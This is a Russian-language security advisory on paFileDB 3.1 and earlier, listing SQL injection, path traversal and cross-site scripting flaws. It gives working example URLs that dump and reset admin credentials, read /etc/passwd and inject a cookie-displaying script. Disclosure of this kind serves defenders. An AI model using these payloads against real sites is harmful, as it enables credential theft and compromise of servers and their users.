• Партнер

  • Программа: paFileDB 3.1 и более ранние версии 

    Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды в базе данных приложения, просмотреть и выполнить произвольные файлы на системе.

    1. SQL-инъекция возможна из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения.

    Примеры:

    http://[target]/pafiledb.php?action=admin&login=do& formname='%20UNION%20SELECT%20admin_id,
    %20admin_username,%20'6f1ed002ab5595859014eb f0951522d9',%20admin_email,%20'1'%20FROM%20
    pafiledb_admin%20WHERE%20'1&formpass=blah& B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do 

    http://[target]/pafiledb.php?select=-99'%20UNION
    %20SELECT%200,admin_username,admin_password,
    0,0,0,0%20FROM%20pafiledb_admin%20WHERE% 201/*&B1=%3E%3E+Edit+Category+%3C%3C&action
    =team&tm=category&category=edit&edit=form&menu1
    =%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam% 26tm%3Dcategory%26category%3Dedit

    http://[target]/pafiledb.php?id=-99'%20UNION%20
    SELECT%200,admin_username,admin_password,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_ admin%20WHERE%201/*&B1=%3E%3E+Edit+
    File+%3C%3C&action=team&tm=file&file=edit& edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3F
    action%3Dteam%26tm%3Dfile%26file%3Dedit

    http://[target]/pafiledb.php?action=team&tm=file& file=edit&id=1&edit=do&query=UPDATE%20
    pafiledb_admin%20SET%20admin_password%20 =%20MD5%281337%28%20WHERE%201/* 

    2. Уязвимость при обработке входных данных в параметре action сценария 'pafiledb.php' позволяет удаленному пользователю просмотреть и выполнить произвольные файлы на целевой системе. 

    Пример:

    http://[target]/pafiledb.php?action=../../../../ etc/passwd%00&login=do 

    3. Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

    Примеры:

    http://[target]/pafiledb.php?action=viewall&start=20& sortby=name%22%3E%3Cscript%3Ealert%28
    document.cookie%29%3C%2Fscript%3E 

    http://[target]/pafiledb.php?action=category&id=1 &filelist=%22%3E%3Cscript%3Ealert%28
    document.cookie%29%3C%2Fscript%3E

    http://[target]/pafiledb.php?action=category&id=1 &pages=%22%3E%3Cscript%3Ealert%28
    document.cookie%29%3C%2Fscript%3E

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии